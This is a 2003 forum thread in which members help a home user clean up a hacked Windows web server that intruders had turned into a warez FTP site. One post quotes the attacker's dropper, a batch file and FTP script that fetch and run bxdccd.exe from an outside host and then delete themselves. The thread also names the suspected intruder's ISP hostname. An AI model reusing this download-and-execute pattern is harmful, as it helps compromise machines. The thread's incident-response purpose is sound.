Try reading up a bit on intrusion detection.

If you really want to learn more about the subject consider setting up a honeypot if you have a spare box.
February 18th, 2003, 08:37 PM
KapperDog

OK, I really am leaving this time. LOL

My wife is screaming about the pics for her eBay auctions so, the server is still up. LOL

I took the IP of the server out of the DMZ and put it into port forwarding under port 80.

Hope this is OK.

See ya in a few and, thanks again, guys.
February 18th, 2003, 08:50 PM
Spyrus

you may also want to consider changing all your passwords. I am not sure if yo uhave thought of this but go through the manage users accounts and take a look in AD, if you are running it, at the list of users, any there that dont belong? delete them. Change the login/password on your router. Change your normal admin and users passwords. Just some precautions to be on the safe side.

Edit: have you run a recent antivirus scan with all the definitions up to date? just a thought make sure he didnt use some form of virii to initially get in
February 18th, 2003, 09:15 PM
TSeNg

hmm.... Well After reading all this, i come to the following:

1) you built a webserver, because you wanted to learn..... Well, your learning.... I think you should take advantage of that fact that your being hacked as we speak.... I say that you try your best to take this guy down, by what DJM said.. Report him..

2)I say you leave the server there,(but disconnect it from your lan) because, you have so much information about him (except his home address) you know where hes at (france), we know that he uses ADSL, and even have his ip... I say take advantage of the fact that he keeps coming back to load files on your server.... if you have this much on him already, why just unplug it now... Read as much as you can brother. We all dont know EVERYTHING, but this gives you no reason to give up.. "I built it to learn" so learn, Learn how to take this guy down..

3) (Gz) is a file extension, i believe when playing around with my linux box, this is a file that is what we call "tarred" like "zipped" in windows case... i think hes using your computer to serve Linux files.... I think you should send those files to someone running linux... maybe they pick apart the file on a machine that is really shitty.. i would say send it to me, but i really dont know enough either! hahaha... awsome thread it gives me shivers reading everyones reply...
Good luck... and remember, if he keeps coming back "he thinks you dont know",or He "wants you to know." and thats where his mistake lies....

I must admit for a cracker that dedicated alot time ****ing up your system, he was REALLY messy.......
February 18th, 2003, 11:07 PM
KissCool

Quote:

i thought it was a french job... this IS french, right?

Yes, it is.
It's strange you have posted this thread now because I have heard very recently from some friends (yes, French friends) about some FTP networks for Warez created by hacking weak boxes. This FTP networks phenomenon sems to be rampant nowadays. Complete script kiddies communities are doing this all the day now.

You should have patched regularly your software before the hack. Now you will have to make a complete reinstall if you want to be certain to have a clean system.

If you want to laugh a bit, you can modify the French welcome messages by something like "this system is now monitored by authorities, your are now considered as suspect in a crime against private material by stealing bandwith..." (something like this). Or if you want a French message: "Ce serveur FTP est maintenant controlé par les autorités judiciaires dans le cadre d'une enquéte pour vol de bande passante, intrusion dans un systéme informatique privé et violation de copyrights. Vous êtes priés de contacter votre fournisseur d'accés Internet ou les autorités juciaires pour donner l'identité de la personne qui a illégalement ouverte ce serveur. Votre IP et vos logs de connections seront conservés pour la durée de l'enquéte. Merci pour votre compréhension"

KC
February 18th, 2003, 11:36 PM
KapperDog

LMAO. Now I remember why I used to spend so much time here. LOL Whatta great crowd.

OK, I would love to leave this up and play with this a little bit. Not really to smoke this guy but, just to learn and maybe scare him out of doing it again.

1 BIG PROBLEM

I don't want the rest of my LAN comprimised.

I don't care about the web server of the information on it.

So, I guess my first task is to secure the rest of the LAN

I have only 1 cable ISP connection so, I can not isolate the lan from the server. (We have to keep in mind that I want to maintain my internet connections and functionality of the rest of the LAN, if possible)

I have taken the server IP out of the DMZ (on the router) and placed it in IP forwarding. Good start? I figure if the router is doing it's job, he doesn't know about the other boxes on the LAN. Right? (Although, I guess any mapped drive would show up). Hmmmm. A little confused. LOL

Anyway, a little advice on keeping him out of the rest of my LAN would be helpful.

If there is any info I can provide, let me know.

Meanwhile, I am going to go back over this thread and review the advice you all have given me.

The first thing I will do is report the intrusion to the ISP.

Thanks again,
KD

2 of the 3 gz files he left were...

.in.new-this-day.gz
.in.new-this-week.gz

They are both full of the following data. This is just a small sample.

Code:

407493 4 drwxrwsr-x 2 ftpmaint ftpmaint 4096 Feb 17 20:52 pub/debian-non-US/dists/potato-proposed-updates 55259234 4 drwxr-xr-x 6 ftpmaint ftpmaint 4096 Feb 18 01:00 pub/debian-non-US 262198 1 -rw-r--r-- 1 ftpmaint ftpmaint 197 Feb 17 20:52 pub/debian-non-US/dists/potato-proposed-updates/Release.gpg 5262178 1 -rw-rw-r-- 1 ftpmaint ftpmaint 784 Feb 17 20:52 pub/debian-non-US/dists/potato-proposed-updates/Release 3759072 4 drwxr-sr-x 5 ftpmaint ftpmaint 4096 Feb 17 20:52 pub/debian-non-US/dists/sarge/non-US 2779424 4 drwxr-sr-x 2 ftpmaint ftpmaint 4096 Feb 17 20:52 pub/debian-non-US/dists/sarge/non-US/contrib/binary-alpha 3014528 1 -rw-r--r-- 1 ftpmaint ftpmaint 92 Feb 17 20:52 pub/debian-non-US/dists/sarge/non-US/contrib/binary-alpha/Release 2779425 4 drwxr-sr-x 2 ftpmaint ftpmaint 4096 Feb 17 20:52 pub/debian-non-US/dists/sarge/non-US/contrib/binary-arm 1485280 1 -rw-r--r-- 1 ftpmaint ftpmaint 90 Feb 17 20:52 pub/debian-non-US/dists/sarge/non-US/contrib/binary-arm/Release 2779426 4 drwxr-sr-x 2 ftpmaint ftpmaint 4096 Feb 17 20:52 pub/debian-non-US/dists/sarge/non-US/contrib/binary-hppa 2035585 1 -rw-r--r-- 1 ftpmaint ftpmaint 91 Feb 17 20:52 pub/debian-non-US/dists/sarge/non-US/contrib/binary-hppa/Release 2779427 4 drwxr-sr-x 2 ftpmaint ftpmaint 4096 Feb 17 20:52 pub/debian-non-US/dists/sarge/non-US/contrib/binary-i386

The 3rd gz file is ls-lR.gz and it's 5.6 meg. The other 2 were 74kb and 472kb.

When I tried to view it with WinZip it asked for the full name of the file in the archive and then would not open it. I've seem password protected zip files before but, never this.

I could email it to someone if they want.

Here is my task manager. See anything running that shouldn't be?

Geeze, I'm going to have to pay JP extra this month for all the bandwidth I'm using. LOL

[IMG]http:/hobbys.no-ip.com/pics/image2.jpg[/IMG]
February 19th, 2003, 02:46 AM
KapperDog

Ya know, the more I dig into this, the more I think I should be embarassed.

I'm a 25+ year puter geek and this is what I did........

I put a web server in the DMZ of the router with no firewall.

I guess I assumed the router firewall was still going to protect it. However, after today, I believe that when I moved the servers IP to the DMZ, I bypassed the router firewall protection.

I feel like I left the door wide open.

Am I that stupid? Don't be shy. Step right up and slap me. LOL

OK, so far here's what I've done.

1. I removed the servers IP from the DMZ and returned the DMZ setting to 192.168.1.0 (I think that's right. It wouldn't let me leave it blank).

Then, I enabled port forwarding for the servers IP port 80 to 80. Protocol TCP (UDP not checked).

2. I went to Zonelabs and downloaded ZA. It's now installed.

I am allowing the server proggy (Savant) access and my wifes ebay pics are proudly displayed on her auctions. LOL

That's about all I've done so far. Going back to do more.

Thanks,
KD

I will try to make my posts short from now on. If anyone wants the files he left, I can zip them and post them here. Hell, I guess I can host them . LOL

I found 2 files in my system32 dir that seemed wrong. 1 is rec.bat and the other is ftp.txt.

Both files are dated a week ago.

Rec.bat

@echo off
echo open ubc.nailed.org 7893>>ftp.txt
echo x>>ftp.txt
echo dcc>>ftp.txt
echo prompt>>ftp.txt
echo bin>>ftp.txt
echo get bxdccd.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
del ftp.txt
bxdccd.exe
del rec.bat /q /f

ftp.txt

open ubc.nailed.org 7893
x
dcc
prompt
bin
get bxdccd.exe
bye

And, yes the bxdccd.exe file is there too
February 19th, 2003, 03:40 AM
omalakai

DNTUS26.EXE

I looked at your Task Manager screen, and one file stood out for me, DNTUS26.EXE.
Shut this file down NOW!
This file is from Dameware NT Utilities (http://www.dameware.com )
Dameware is a nice Windows administration tool. It combined User Manager, Server Manager, and many other functions into a single application. I use it at the office every day to manage my servers.
One of the functions is its own remote control application.
The way it works is, you connect to a remote machine over TCP por 139 and authenticate with a valid username & password. At that point, the target portion of the appliction is installed and set up to run AS A SERVICE!
This target program is a trojan. It sets up on its own port (you can specify what port) so the attacker can connect to it and have console access.
It also locks out the keyboard and mouse on your side (if configured to do so, but that is optional).

The service it sets up is called "Dameware Mini Remote Control". Go and stop that service, or kill the EXE that is running. Personally, I would Disable the service until I could delete it.

Now, this also goes to show that you need to change all of your passwords, since at least one was compromised to install Dameware.
February 19th, 2003, 03:41 AM
Tiger Shark

Kapper:

If your machine was DMZ'ed on a linksys then your other machines should be fine _if_ you haven't got 2 NIC's in the DMZ machine and connect to both or allow any port forwarding to an internal box. If that's the case then you have a choice.... I can see a couple of things we can do to play with these guys if you want and if you feel confident enough....... I have no intention of having you place anything at risk other than what is already compromised.... you'll need some time available and a machine that you can place to watch the compromised system.... you have 10 machines you say but I have no idea what they are..... if you want to play a bit then we can.... If you want to be cleaned and secured we can do that too..... Frankly, if you are in the slightest bit unhappy with playing then tell me to go away and your best course of action is to format and reinstall everything and put a firewall in place.... OTOH.... If you want to _play_ then you will have to reformat and reinstall anyway.

My motivation here? It was great for me to see a hack "in progress"..... It wasn' the _most_ efficient hack ever..... there were mistakes..... knowing they make mistakes and knowing therefore that they might make others I would love to watch the upcoming scenario.....

But it ain't my box...... Period..... It's yours..... I defer to your better judgement... I'll discuss the event you showed us in the morning.....
February 19th, 2003, 04:52 AM
KapperDog

Well guys, I am in over my head but, isn't that how we learn to swim? LOL

Like I said, my only concern is the other boxes on my LAN.

I don't mind playing but, first I would like to cover a couple of the basics.

1. It looks like this box was compromised by more than 1 hacker. How did they all get in?

2. Am I set up properly, now, to prevent new intrusions?

Once I'm comfy with that we can move to repairing the damage I did to his hack and see if he comes back.

As far as DNTUS26.EXE, I could not delete the file and I could not stop the service. I restarted in safe mode and was able to delete the .exe file.

Now, there looks to be a dozen or so entries for DNTUS*.* in my registry. After all these years, I still don't feel comfy in regedit. Looks like I better start. LOL

Anyway, the service is no longer running. Thanks.
February 19th, 2003, 06:21 AM
lucktsm

Wow, that actually scares me. This guy was pretty good.
French language in the text files. Interesting. Does look like a warez site. May want to keep tabs on other traffic and/or disk usage.

I really like the honeypot idea, great way to learn more if you have a fish on the line.

I really don't know if I trust the lynksys router. You may want to load any updates and reset to factory and reconfigure it. I had a lynksys and I had really weird stuff happen.
February 19th, 2003, 07:02 AM
KapperDog

The Linksys router has the latest updates to the firmware....and did before the hack.

I don't think there is anything wrong with the router or it's config. I think puttin git in the DMZ without a firewall left it wide open.....yes?

I finally got Telnet server to shut down and I'm just finishing up doing google searches on all the other processes running in my task manager.

If he comes back around the same time tonight, he should be here in a few hours.
February 19th, 2003, 07:05 AM
Tedob1

SamSpade gave up the account s/he's using:

AToulon-103-1-2-43.abo.wanadoo.fr

what a surprise wanadoo. you got enough to nail'em if you wanted too and wanadoo would do something about it.
February 19th, 2003, 07:09 AM
TSeNg

Quote:

Originally posted here by lucktsm
Wow, that actually scares me. This guy was pretty good.

Sorry brother, I got to disagree, he was not good. He was So messy, Leaving the Command prompt up... he might as well gave us his phone number, and home address.....

about the french i believe its french hacker groups causing trouble... but all in all... "script Kiddies" very messy...

Thats the whole point of the honeypot... he wont even know what hes stepping into becuase hes messy....

Show 40 post(s) from this thread on one page